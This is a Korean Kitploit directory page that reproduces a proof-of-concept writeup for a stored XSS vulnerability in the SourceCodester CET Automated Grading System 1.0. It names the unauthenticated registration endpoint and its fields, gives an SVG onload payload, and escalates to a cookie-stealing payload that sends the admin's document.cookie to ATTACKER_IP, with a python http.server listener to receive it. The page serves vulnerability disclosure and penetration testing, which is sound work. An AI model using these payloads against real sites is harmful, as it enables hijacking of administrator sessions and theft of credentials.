Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-7401-XSS — SourceCodester CET 자동 채점 시스템 1.0의 저장형 XSS에 대한 개념 증명으로, 학생 등록을 통한 인증되지 않은 페이로드 주입이 관리자 세션 하이재킹으로 이어지는 것을 시연합니다. | Kitploit
도구/GitHubGitHub/xmyronn/cve-2026-7401-xss
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

SourceCodester CET 자동 채점 시스템 1.0의 저장형 XSS에 대한 개념 증명으로, 학생 등록을 통한 인증되지 않은 페이로드 주입이 관리자 세션 하이재킹으로 이어지는 것을 시연합니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CET 자동 채점 시스템의 저장형 XSS — 학생 등록 (인증 없음 → 관리자 대시보드)

세부 정보

필드값
공급업체SourceCodester
공급업체 URLhttps://www.sourcecodester.com
제품PHP 및 MySQL 기반 AI 예측 분석 기능을 갖춘 CET 자동 채점 시스템
제품 URLhttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
버전1.0
취약점저장형 크로스 사이트 스크립팅 (XSS)
CWECWE-79
CVSSv3 점수8.8 (높음)
공격 경로네트워크
인증 필요없음 (학생 자체 등록은 공개됨)
피해자관리자
사용자 상호작용필요 (관리자가 대시보드 방문)
연구자Imad Alvi
날짜2026-04-13

영향을 받는 구성 요소

파일: PersonalAGS/index.php?action=register (학생 등록)
매개변수: student_id, full_name, section, username (POST)
트리거 위치: PersonalAGS/index.php?action=dashboard (관리자 대시보드)


설명

CET 자동 채점 시스템 1.0의 학생 자체 등록 포털은 데이터베이스에 저장하기 전에 사용자 입력을 삭제하거나 인코딩하지 않습니다. 인증되지 않은 공격자는 JavaScript 페이로드를 등록 필드에 주입하여 학생 계정을 등록할 수 있습니다. 악성 페이로드는 데이터베이스에 저장되며, 등록된 학생이 나열된 대시보드를 방문하는 모든 관리자의 브라우저에서 실행됩니다.

이는 심각한 공격 체인입니다 — 페이로드 주입에 인증이 필요하지 않지만, 권한 있는 관리자 컨텍스트에서 실행되어 세션 쿠키 탈취 및 관리자 계정 완전 장악이 가능합니다.


개념 증명

1단계 — 학생 등록 페이지로 이동 (인증 불필요)

공개 학생 자체 등록 페이지로 이동합니다:

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

2단계 — 등록 필드에 XSS 페이로드 주입

모든 필드에 XSS 페이로드를 입력하고 계정 등록을 클릭합니다:

  • 학생 ID 번호: "><svg onload=alert(1)>
  • 성명: "><svg onload=alert(1)>
  • 분반: "><svg onload=alert(1)>
  • 희망 사용자 이름: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

등록이 성공합니다 — 페이로드가 데이터베이스에 저장됩니다.

3단계 — 관리자 대시보드에서 XSS 실행

관리자가 로그인하여 대시보드를 방문하면 주입된 페이로드가 즉시 실행됩니다. 경고 팝업이 표시되고 주입된 HTML로 인해 페이지 레이아웃이 눈에 띄게 손상됩니다 — 이는 페이로드가 관리자 패널에서 삭제되지 않은 채 렌더링됨을 확인시켜 줍니다.

대시보드 섹션 헤더에도 주입된 값이 반영됩니다:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

세션 하이재킹 페이로드

공격자는 등록 필드에 다음 페이로드를 사용하여 이를 완전한 관리자 세션 하이재킹으로 확대할 수 있습니다:

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

공격자 머신에 리스너를 설정합니다:

root@kitploit:~
python3 -m http.server 8888

관리자가 대시보드를 방문하면 세션 쿠키가 공격자의 서버로 전송되어 완전한 계정 장악이 가능해집니다.


영향

인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  • 공개 학생 등록을 통해 관리자 대시보드에 지속적인 JavaScript 주입
  • 관리자의 세션 쿠키를 탈취하여 관리자 계정 장악
  • 피해자를 대신하여 모든 관리자 작업 수행
  • 관리자를 악성 페이지로 리디렉션
  • 관리자 대시보드 변조

페이로드 주입에 인증이 필요하지 않습니다. 공격은 관리자가 대시보드를 방문할 때 자동으로 실행됩니다.


참고 자료

  • SourceCodester — CET 자동 채점 시스템
  • CWE-79: 웹 페이지 생성 중 입력의 부적절한 중화
도구 다운로드